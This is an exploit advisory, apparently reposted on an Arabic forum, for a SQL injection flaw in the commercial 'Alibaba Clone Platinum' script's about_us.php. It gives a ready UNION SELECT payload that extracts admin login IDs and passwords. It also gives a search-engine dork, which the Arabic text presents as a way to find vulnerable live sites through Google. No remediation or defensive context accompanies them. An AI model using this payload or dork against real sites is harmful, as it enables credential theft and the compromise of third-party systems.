| اقتباس | | | | | | | | | # title: Alibaba Clone Platinum (about_us.php) sql Injection vulnerability
# edb-id: 12612
# cve-id: ()
# osvdb-id: ()
# author: Cobra_21
# published: 2010-05-15
# verified: Yes
# download exploit code
# download n/a
view source
print?
-------------------------------------------------------------------------------------------
alibaba Clone Platinum (about_us.php) sql Injection vulnerability
-------------------------------------------------------------------------------------------
author: Cobra_21
mail: uyku_cu@windowslive.com
script home: http://www.alibabaclone.com/
price: $699 usd
dork: Inurl:buyer/about_us.php?buyerid
-------------------------------------------------------------------------------------------
sql injection: http://localhost/[path]/buyer/about_us.php?buyerid=-31%20union/**/select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,concat%28loginid,0x3a,password%29,38,39, 40%20from%20admin
------------------------------------------------------------------------------------------- | | | | | |
الإستغلال .:
| اقتباس | | | | | | | | | http://localhost/[path]/buyer/about_us.php?buyerid=-31%20union/**/select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,concat%28loginid,0x3a,password%29,38,39, 40%20from%20admin | | | | | |
الدورك للبحث عن المواقع المصابه في محركات البحث مثل قوقل .:
| اقتباس | | | | | | | | | inurl:buyer/about_us.php?buyerid | | | | | |
Alibaba Clone Platinum (about_us>php) SQL Injection Vulnerability